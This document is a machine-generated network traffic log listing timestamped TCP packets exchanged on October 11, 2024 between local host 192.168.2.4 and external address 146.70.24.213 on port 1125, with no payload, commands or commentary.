Oct 11, 2024 16:53:46.546222925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546257973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546310902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.546334982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546367884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546367884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.546417952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546452045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546485901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546518087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546534061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.546534061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.546653032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546688080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546691895 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.546756029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.546788931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.548229933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548280954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548408985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548439980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548458099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548504114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548518896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.548518896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.548546076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548578978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548626900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548659086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548674107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.548674107 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.548696041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548729897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548737049 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.548762083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548795938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548829079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.548914909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.548914909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.549309969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.549345016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.549377918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.549410105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.549467087 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.549489975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.549523115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.549556017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.549639940 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.549639940 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.550012112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550108910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550124884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.550142050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550174952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550359011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550430059 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.550430059 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.550508976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550543070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550575972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550713062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550781012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550786018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.550786018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.550815105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550884962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.550906897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.550959110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.551162004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.551229954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.551335096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.551402092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.551405907 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.551443100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.551688910 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.552869081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.552918911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.552969933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553010941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553014994 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.553129911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.553133965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553169012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553201914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553235054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553244114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.553267956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553298950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553330898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553354025 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.553363085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553417921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553476095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.553476095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.553875923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.553970098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.554002047 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.554004908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.554055929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.554097891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.554137945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.554141998 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.554179907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.554200888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.554220915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.554255009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.554331064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.554331064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.575805902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.636708975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.636763096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.636797905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.636830091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.636838913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.636881113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.636913061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.636960983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.636974096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.636974096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.636993885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637043953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637048960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.637075901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637134075 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.637164116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637197971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637231112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637263060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637299061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637304068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.637304068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.637331009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637362957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637393951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637427092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637437105 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.637437105 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.637459993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637492895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637511015 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.637525082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.637619972 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.638499975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638550997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638581991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638616085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638622999 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.638664961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638698101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638729095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638741970 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.638741970 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.638762951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638823986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638866901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.638880014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638909101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638957024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638989925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.638999939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.638999939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639022112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639054060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639085054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639132977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639141083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639141083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639167070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639199018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639233112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639266014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639276028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639276028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639359951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639417887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639420033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639456034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639488935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639527082 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639537096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639586926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639619112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639650106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639657021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639657021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639698982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639730930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639744043 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639763117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639799118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639830112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639862061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639873028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639873028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.639902115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639946938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.639997005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640028954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640039921 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640039921 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640078068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640110016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640141964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640173912 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640183926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640183926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640207052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640243053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640275002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640320063 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640320063 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640324116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640352964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640451908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640484095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640517950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640527964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640527964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640552044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640583992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640620947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640733957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640780926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640782118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640831947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640865088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640897036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640940905 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640940905 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.640945911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.640990019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641026020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641078949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641110897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641124010 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641124010 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641143084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641176939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641207933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641242981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641253948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641253948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641277075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641309977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641341925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641374111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641386986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641386986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641407013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641441107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641515970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641560078 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641560078 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641565084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641597986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641628981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641663074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641695023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641709089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641709089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641758919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641807079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641838074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.641880989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.641880989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.642987013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643038988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643093109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.643110991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643165112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643224955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643241882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.643258095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643290997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643321991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643337011 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.643357038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643413067 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.643418074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643456936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.643610954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.695765018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.750987053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751024961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751080990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751121998 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751177073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751229048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751300097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751329899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751380920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751409054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751446009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751494884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751528025 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751528025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751562119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751595020 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751595020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751629114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751646996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751662970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751692057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751724005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751750946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751758099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751770973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751791954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751828909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751859903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751889944 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751893997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751928091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751933098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.751964092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.751996040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.752018929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.752027035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.752059937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.752065897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.752091885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.752123117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.752125978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.752161026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.752182961 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.752260923 CEST	1125	49730	146.70.24.213	192.168.2.4
